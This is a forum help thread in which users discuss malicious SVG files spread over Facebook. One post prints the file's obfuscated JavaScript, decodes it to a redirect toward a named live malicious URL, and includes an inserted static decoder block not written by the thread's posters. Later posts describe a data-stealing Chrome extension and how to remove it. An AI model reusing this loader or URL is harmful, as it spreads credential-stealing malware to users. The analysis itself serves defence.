
Facebook SVG file transferring


7 replies to this topic

#1 2lanh

  • Members
  • 2 posts
  • OFFLINE

Posted 19 November 2016 - 10:23 PM

A friend of mine got infected and sent me an SVG file. She's really close, so I didn't suspect a thing until she spoke out when I asked. However, when I opened it in Internet Explorer, it didn't show anything; it appeared as an error and couldn't open the file. The antivirus, ESET NOD32, didn't respond either. To be sure, I deleted the file and of course am running a full scan on my computer. I am still a bit worried and paranoid though. Is my computer infected?


https://www.virustotal.com/en/file/ce368ce3cab77a864063f9fd86fcca15998372156499091bc7855f1ab56f0296/analysis/1479610286/

Link to the file's scan result.

My system is Windows 10.


Edited by 2lanh, 19 November 2016 - 10:37 PM.




#2 ShawnSiew

  • Members
  • 1 posts
  • OFFLINE

Posted 20 November 2016 - 04:49 AM

Same problem here.



#3 MetalowaGlowa

  • Members
  • 21 posts
  • OFFLINE
  • Gender:Male
  • Location:Poland

Posted 20 November 2016 - 05:04 PM

The same happened to me. Got those files from 2 FB friends (with whom I rather don't talk, and that aroused my suspicions). Any info on this new FB "virus"?



#4 macgyerman

  • Members
  • 1 posts
  • OFFLINE

Posted 20 November 2016 - 05:06 PM

As far as I can tell you're probably safe. If you download the .svg file and open it with a text editor, you'll see the following code:

 <script type="text/javascript"><![CDATA[
    function mecoqjmg(mngiz,hsmtj,orqek){
      var lwnljr = "oLyX3BxiJavVOAPI4Tz.F8=5Mcg0tf?SKZh_sUEYuNn1DbeCm2/l6d97j:RGpkrH";
      var yixkoy = ["\/updA7I6l=TiRtYn_rmoM2VczJk0sZ8PLB.GxCaj:Sf5Oy41?gDhUe9NvHEFXb3K","527=:.v?rNgVRTsft0pJj6MUA1_dZ9cY\/DyCkl4KiuLm8PXIbexS3nhBEaHFozOG","cD?=FLj78vtRafU26zYsrHukXpKAJ94h50_lo:OMTm.SNynxEC1B\/Pb3IdZVeiGg","_YNP?mru\/g6Vf.CR9tvdzGTkMlx=hJ72FpUBeiZK8Ly:Ocaj0bn45sXD1ESAI3oH","V820ym5f3oGu1CeZxagFkBpXl=j_A9viYOrN?DJh.R6:zLP7dnTMcsb4IKHUtE\/S","YbUJZ:VkXMaerE.9upIFiScymT7z53_L\/v6CAN=4H1?ROPn2Bhjxt0GfoDlsgdK8","cI8j=dE?st\/YKmZgn3:GU5RlPo._vHuOBp79ry1J4CDi2NhakTfXV6AFbLe0MxSz"];
      var cffcjm = "";
      var vgecuv = 0;
      while(yixkoy[vgecuv]){
        vgecuv++;
      }
      var vjnqps = 0;
      while(mngiz[vjnqps]){
        var qepelh = 0;
        var weprnd = -1;
        while(lwnljr[qepelh]){
          if(lwnljr[qepelh] == mngiz[vjnqps]){
            weprnd = qepelh;
            break;
          }
          qepelh++;
        }
        if(weprnd >= 0){
          var ftxhx = 0;
          var wouwgf = -1;
          while(yixkoy[vjnqps%vgecuv][ftxhx]){
            if(yixkoy[vjnqps%vgecuv][ftxhx] == mngiz[vjnqps]){
              wouwgf = ftxhx;
              break;
            }
            ftxhx++;
          }
          cffcjm += lwnljr[wouwgf];
        }else{
          cffcjm += mngiz[vjnqps];
        }
        vjnqps++;
      }
      var sasocg = "";
      for(bnuxb=hsmtj;bnuxb<cffcjm.length;bnuxb++){
        sasocg += cffcjm[bnuxb];
      }
      cffcjm = sasocg;
      return cffcjm;
    }
  var khaify = window;
  var klisuy = mecoqjmg("qn_46UX.qq6MAv/o",13,true);
  var xhzlzb = mecoqjmg("qkv3sTk.veqMYo=Z7_6",11,false);
  var bdcjet = mecoqjmg("kgBwg5??OT8rdMsyGa9",15,true);
  khaify[klisuy][xhzlzb][bdcjet] = mecoqjmg("?Z_hAgLDxE_.K?eJp_djM.o1h/HrsJeUt",2,true);
  ]]></script>

It appears to decrypt some data and then execute a window function (see the second-to-last line and the definition of khaify, 4 lines prior).


I modified the code and ran it, and it does exactly that. By replacing the second-to-last line with

console.log(klisuy);
console.log(xhzlzb);
console.log(bdcjet);
console.log( mecoqjmg("?Z_hAgLDxE_.K?eJp_djM.o1h/HrsJeUt",2,true));

you'll get:

top
location
href
http://mourid.com/php/trust.php

So, it appears that the file attempts to redirect you to http://mourid.com/php/trust.php. Attempting to load the site in a dummy browser returns nothing. Therefore, I assume it's attempting to jack information from HTTP variables (IP, etc.). I have no clue what the point would be.
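The same decoding carried out statically, as an added example that is not code from the thread or from the malware author: the alphabet and the seven substitution tables are copied from the posted script (lwnljr and yixkoy), the function and variable names are mine, and the third boolean argument of the original function is unused so it is dropped. Reading the four strings this way lets an analyst recover the redirect target without ever loading the SVG in a browser.

```javascript
// Added example: static decoder for the substitution scheme in the SVG
// script above. ALPHABET and TABLES are the lwnljr / yixkoy strings copied
// from the posted script; the names are mine, not the malware's.
const ALPHABET = "oLyX3BxiJavVOAPI4Tz.F8=5Mcg0tf?SKZh_sUEYuNn1DbeCm2/l6d97j:RGpkrH";
const TABLES = [
  "\/updA7I6l=TiRtYn_rmoM2VczJk0sZ8PLB.GxCaj:Sf5Oy41?gDhUe9NvHEFXb3K",
  "527=:.v?rNgVRTsft0pJj6MUA1_dZ9cY\/DyCkl4KiuLm8PXIbexS3nhBEaHFozOG",
  "cD?=FLj78vtRafU26zYsrHukXpKAJ94h50_lo:OMTm.SNynxEC1B\/Pb3IdZVeiGg",
  "_YNP?mru\/g6Vf.CR9tvdzGTkMlx=hJ72FpUBeiZK8Ly:Ocaj0bn45sXD1ESAI3oH",
  "V820ym5f3oGu1CeZxagFkBpXl=j_A9viYOrN?DJh.R6:zLP7dnTMcsb4IKHUtE\/S",
  "YbUJZ:VkXMaerE.9upIFiScymT7z53_L\/v6CAN=4H1?ROPn2Bhjxt0GfoDlsgdK8",
  "cI8j=dE?st\/YKmZgn3:GU5RlPo._vHuOBp79ry1J4CDi2NhakTfXV6AFbLe0MxSz",
];

// Each table is a permutation of ALPHABET. The ciphertext character at
// position i is looked up in TABLES[i % 7]; its index there selects the
// plaintext character from ALPHABET (a polyalphabetic substitution).
// Characters outside ALPHABET pass through unchanged, and the first `skip`
// characters of the result are junk padding that the script discards.
function decode(cipher, skip) {
  let plain = "";
  for (let i = 0; i < cipher.length; i++) {
    const ch = cipher[i];
    const idx = TABLES[i % TABLES.length].indexOf(ch);
    plain += ALPHABET.includes(ch) && idx >= 0 ? ALPHABET[idx] : ch;
  }
  return plain.slice(skip);
}

// Resolve the four calls the script makes, in order, and report the
// assignment it would perform: window[obj][prop1][prop2] = value.
function describePayload() {
  const obj = decode("qn_46UX.qq6MAv/o", 13);
  const prop1 = decode("qkv3sTk.veqMYo=Z7_6", 11);
  const prop2 = decode("kgBwg5??OT8rdMsyGa9", 15);
  const value = decode("?Z_hAgLDxE_.K?eJp_djM.o1h/HrsJeUt", 2);
  return { target: `window.${obj}.${prop1}.${prop2}`, value };
}

const report = describePayload();
console.log(`${report.target} = "${report.value}"`);
```

Because the tables only permute the alphabet, the decoder is a lookup rather than anything cryptographic; the same function will decode any further strings found in variants that reuse these tables.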



#5 MetalowaGlowa

  • Members
  • 21 posts
  • OFFLINE
  • Gender:Male
  • Location:Poland

Posted 20 November 2016 - 05:51 PM

Downloaded one photo. Tried to open it but had no application for it. So tried an online viewer. There was this code mentioned by macgyerman (not sure if exactly the same). So far nothing happens. No browser page launched. No extensions installed in the browser. Running scans with Defender/AdwCleaner/Malwarebytes. Just as a precaution.



#6 Tomer

  • Members
  • 1 posts
  • OFFLINE

Posted 20 November 2016 - 06:23 PM

Actually, I believe this is some sort of virus.

I got this from a friend after she opened such an .svg file from a friend of hers.

Other than myself, the rest of her friends also got it.

And they got it again a few times later on.

It seems to send itself over Facebook after you run it.


Perhaps the page tests the browser?

She opened it in Internet Explorer, I think.

The file continued being sent (with a different name each time) even after she restarted her computer.



#7 bobkets

  • Members
  • 1 posts
  • OFFLINE

Posted 20 November 2016 - 07:10 PM


I got this "wonderful" thing too, and I played a bit with it. Turns out, it only activates when you are using Chrome, because it tries to install an extension called "One", which is the darn virus. If you open it with any other browser (Opera, Firefox, Edge, IE, Safari, etc.), you will get only the white page; nothing will happen.

I think that the main essence of the virus is the extension, because it then tries to steal your data from Facebook. When you open it in Chrome, it looks like this: (image: Xyn9g.jpg)

If you click "Add extension", you get infected, and it redirects to Facebook. At this point, you should immediately close Chrome and uninstall it. Or you can open the extensions tab and delete the extension called "One", but I don't think it removes it completely.

After removing it, I suggest changing your Facebook password and logging out from all the other instances. (Facebook offers an option to do so.)


Edited by bobkets, 20 November 2016 - 07:10 PM.


#8 2lanh
  • Topic Starter

  • Members
  • 2 posts
  • OFFLINE

Posted 23 November 2016 - 08:26 AM

Thank you, Bob, I feel much more relieved now :D
